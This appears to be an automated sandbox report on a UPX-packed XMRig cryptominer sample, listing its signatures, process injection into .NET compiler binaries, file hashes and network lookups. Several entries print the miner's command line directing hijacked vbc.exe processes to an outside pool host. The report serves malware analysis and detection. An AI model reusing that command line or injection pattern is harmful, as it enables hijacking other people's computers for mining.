Malware Analysis Report

2024-09-10 13:54

Sample ID 240613-qnxkqsvcnq
Target a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118
SHA256 9931ed9a4ecdbd530f9521963fd398b5e75db27b008bf23ca3d6533eeb71a9ac
Tags xmrig miner upx
Score 10/10


Analysis Overview

Score 10/10

SHA256 9931ed9a4ecdbd530f9521963fd398b5e75db27b008bf23ca3d6533eeb71a9ac

Threat Level: Known bad

The file a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

Tags xmrig miner upx

XMRig Miner payload

UPX packed file

Uses the VBS compiler for execution

Suspicious use of SetThreadContext

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-13 13:25

Signatures

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 13:25

Reported

2024-06-13 13:27

Platform

win7-20240611-en

Max time kernel

149s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe"

Signatures

xmrig (tags: miner, xmrig)

XMRig Miner payload (tags: miner)

UPX packed file (tags: upx)

Uses the VBS compiler for execution

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2336 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2408 wrote to memory of 2932 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2336 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 2336 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fz5p5nzm\fz5p5nzm.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1D60.tmp" "c:\Users\Admin\AppData\Local\Temp\fz5p5nzm\CSC626E9D94D2784E3A9660938EA453D8EA.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe

-o relay.100chickens.me:8000 --max-cpu-usage 15 -u 1 -p x -k -a cryptonight --variant="-1"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe

-o relay.100chickens.me:8000 --max-cpu-usage 99 -u 1 -p x -k -a cryptonight --variant="-1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 relay.100chickens.me udp

Files

memory/2336-0-0x000007FEF58B3000-0x000007FEF58B4000-memory.dmp

memory/2336-1-0x0000000000920000-0x00000000009A2000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\fz5p5nzm\fz5p5nzm.cmdline

MD5 0f2e86c4e85c03d26d50bcb03356d5e2
SHA1 c5a4aa25bcc1adf991026db294b51086ef25e0c8
SHA256 7a8576fc55879e99d59c8342a7d2fc4950cb8053cd6b2b4a8b61fc03f7db64d1
SHA512 7866896835c52b356ed05d02c8a5cbf816d977e864c12335b8c8d882a1438f08820a0552a199600626a051f8daa50410f6f2f89295063ccd71a661486127251e

\??\c:\Users\Admin\AppData\Local\Temp\fz5p5nzm\fz5p5nzm.0.cs

MD5 5948bce18180803e60088f2616225169
SHA1 0e992166427f0a8bce3849d9a3168c25f0733996
SHA256 d14f42c88c197dfa3d124b22280971ba819531752ef659ed2dd81e034082519a
SHA512 696fa5c75209a368ab5204f08c98140977360285849bd38eadb4db6e954d59291e0c36417afe84b129e8bbead6c4a1228a4dd70ec2eb0613d7f400496bfb049c

memory/2336-7-0x000007FEF58B0000-0x000007FEF629C000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\fz5p5nzm\CSC626E9D94D2784E3A9660938EA453D8EA.TMP

MD5 f4a08c1e8d85cbc7aea7d8dc1b5a01f8
SHA1 5613ca5774bca147b9af27cfea0b8e9b6e79b2dd
SHA256 e55a535ce8ef7a8b3497b78fbdb2c10d103e24fdbdd021bb38fef925e427ace2
SHA512 a4ed1a5205f873ed8c88bffa999ced81b1bd69a1c75c27ce84562e038b2468e4fcea332d3d971efec8958209771e1fb10afa25f50dab3b9e926da4892a2f82c7

C:\Users\Admin\AppData\Local\Temp\RES1D60.tmp

MD5 bdef930111b15e12857483bd5a0e2421
SHA1 ad0d48c080133d6dc8d8325da9d8345a06e36a64
SHA256 aeb6dbec3e7ec80486f8de02afab121a53be2be3bcfc5fa9f0b0ed68b3bea1b9
SHA512 5cac5e679141cafcf9267577c10ad90fb379ebde472ee448097f7e00f67bb3bf542937bf99c8ad97234389fbe5ab5a9d567e403d12f1f4c2e408c9b0e91a8d48

C:\Users\Admin\AppData\Local\Temp\fz5p5nzm\fz5p5nzm.dll

MD5 8ff7b5b35765b4bd1135a9b17e13fcb6
SHA1 697a30a1fa69e653ebd33f3af2799e623f5bbdc0
SHA256 de31b0e4c39a4e1bf8002bad0b9db2d07f540d110bc90ab384b497960112c65c
SHA512 e522e4876cc6ba949ca7d91b67b906adaa1d771bc22c9cc12a84aa4208a03288515fbb3b2f4c65062de1d2fc0489d1944fca4a2f9c13a112e59401797364fc5b

C:\Users\Admin\AppData\Local\Temp\fz5p5nzm\fz5p5nzm.pdb

MD5 f956b429d574edd92d5daa75ccfe3e0e
SHA1 81341532110c4f75cbd7cccf684cea11bade5bf7
SHA256 683d8a0bce053409826f3312d638905451c8dab49112dbba67f0784b2ab12bd3
SHA512 7750f290359d0736e877ba2857c6ab8158e29cd6ab514b3afe10dd57881cc203c00a02650df79495e744f109ad983f93e2ca9d6198b6ed4e67230f8603f3172c

memory/2336-17-0x0000000000160000-0x0000000000168000-memory.dmp

memory/2336-19-0x0000000002100000-0x0000000002184000-memory.dmp

memory/2424-27-0x000007FFFFFDB000-0x000007FFFFFDC000-memory.dmp

memory/2424-29-0x0000000000400000-0x0000000000529000-memory.dmp

memory/2424-26-0x0000000000400000-0x0000000000529000-memory.dmp

memory/2424-24-0x0000000000400000-0x0000000000529000-memory.dmp

memory/2424-22-0x0000000000400000-0x0000000000529000-memory.dmp

memory/2424-20-0x0000000000400000-0x0000000000529000-memory.dmp

memory/2764-38-0x000007FFFFFDA000-0x000007FFFFFDB000-memory.dmp

memory/2764-40-0x0000000000400000-0x0000000000529000-memory.dmp

memory/2764-41-0x0000000000400000-0x0000000000529000-memory.dmp

memory/2336-42-0x000007FEF58B0000-0x000007FEF629C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 13:25

Reported

2024-06-13 13:27

Platform

win10v2004-20240611-en

Max time kernel

148s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe"

Signatures

xmrig (tags: miner, xmrig)

XMRig Miner payload (tags: miner)

UPX packed file (tags: upx)

Uses the VBS compiler for execution

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3108 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2224 wrote to memory of 2728 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3108 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
PID 3108 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\a5c4e5a50eb533016e2533067cb48bc5_JaffaCakes118.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2zybln3u\2zybln3u.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES37F8.tmp" "c:\Users\Admin\AppData\Local\Temp\2zybln3u\CSC69C60CB393BF40C397A0E077D3DE779.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe

-o relay.100chickens.me:8000 --max-cpu-usage 15 -u 1 -p x -k -a cryptonight --variant="-1"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe

-o relay.100chickens.me:8000 --max-cpu-usage 99 -u 1 -p x -k -a cryptonight --variant="-1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 relay.100chickens.me udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 155.77.117.104.in-addr.arpa udp
BE 88.221.83.192:443 www.bing.com tcp
US 8.8.8.8:53 192.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

memory/3108-0-0x0000000000240000-0x00000000002C2000-memory.dmp

memory/3108-1-0x00007FFB32433000-0x00007FFB32435000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\2zybln3u\2zybln3u.cmdline

MD5 54cb40d9b794882c2c149f774de9133a
SHA1 76374b7c76252fcec2c32bac1bb04ae9dae8915d
SHA256 4211eb643c4426860268c61a3c49392ced0b240b90daffc471ada01c58c46455
SHA512 cdbebea5235992441dd00d7bab9d299bcf0c74cfdf9676c792bbee8cbc7d89f88948e073d5930048fb965a8b3fc135497ca646f68561f0300b9ad0a95c1ca991

\??\c:\Users\Admin\AppData\Local\Temp\2zybln3u\2zybln3u.0.cs

MD5 5948bce18180803e60088f2616225169
SHA1 0e992166427f0a8bce3849d9a3168c25f0733996
SHA256 d14f42c88c197dfa3d124b22280971ba819531752ef659ed2dd81e034082519a
SHA512 696fa5c75209a368ab5204f08c98140977360285849bd38eadb4db6e954d59291e0c36417afe84b129e8bbead6c4a1228a4dd70ec2eb0613d7f400496bfb049c

memory/3108-6-0x00007FFB32430000-0x00007FFB32EF1000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\2zybln3u\CSC69C60CB393BF40C397A0E077D3DE779.TMP

MD5 d8831db7810f6d899bd69a53268b3abb
SHA1 3f665c6e0e68775922f6b7c19ce5f05bf5150800
SHA256 5739c8152809b5b6eb12783b3afc98735434955b3747e5c521153b4ba480fa46
SHA512 a5ace05cfbad4b9d361c551e4eb90548ae77b5f199352a78661e8ad7df18ca411fb3ca544af23465d917c738e4e8834c305d4f27458e972b7a10c26f1397d445

C:\Users\Admin\AppData\Local\Temp\RES37F8.tmp

MD5 e8e8484701b313589ea36e6be9119350
SHA1 851d26ca842cf853a82cf4bcb9c1bd800a3fa05d
SHA256 36d67c352b1a2eb845c20ecdf6f8a7076543ca463f7fcb02bf48138b90bddefe
SHA512 2345704240e4420faac19ee63ab9d7b52d3dabaaa7a61081ddb1283f806b28be992661cb2c3f58c15a1b949886d1e5e4dbde2eec74cfdcfc1032f2810c40ae43

C:\Users\Admin\AppData\Local\Temp\2zybln3u\2zybln3u.dll

MD5 510200e372ad8b060830f424053a06ab
SHA1 dc71a0093c011744ae7cdc2e863740c22c75ef21
SHA256 9481f2dbad398442ba4963db0ff8d52848020456ed0020e1e0a43d0dcc41a032
SHA512 385b4ebbc3c7abfdf3d71205d360c56cd70e98e9a24595a0d417c77cb5382fde2e3b1bd97430ab097b00f3a8cef851adb3cf3ad238f6bee2fc2d63e89a1ce2d5

C:\Users\Admin\AppData\Local\Temp\2zybln3u\2zybln3u.pdb

MD5 08e4eca89b8632c4f04bcd8ca6c623ae
SHA1 d71819cb1269700acb3ce79681c6637082500736
SHA256 00dc733a23db2cf2fbf99f67ef763fac626ee9e229655168b87404f9c7516efb
SHA512 c08f16e203ac8bba3245118ccbdb47c4036be93582b1856d77612e038ac58a626ab8a2bc67c6efda62e02af71fb0aadf698ae669936e3bd133f3c598e2ad1c09

memory/3108-17-0x0000000000BA0000-0x0000000000BA8000-memory.dmp

memory/3108-19-0x000000001B2F0000-0x000000001B374000-memory.dmp

memory/3904-20-0x0000000000400000-0x0000000000529000-memory.dmp

memory/3108-23-0x00007FFB32430000-0x00007FFB32EF1000-memory.dmp

memory/3168-26-0x0000000000400000-0x0000000000529000-memory.dmp

memory/3168-25-0x0000000000400000-0x0000000000529000-memory.dmp

memory/3168-27-0x0000000000400000-0x0000000000529000-memory.dmp

memory/3168-24-0x0000000000400000-0x0000000000529000-memory.dmp

memory/3168-28-0x0000000000400000-0x0000000000529000-memory.dmp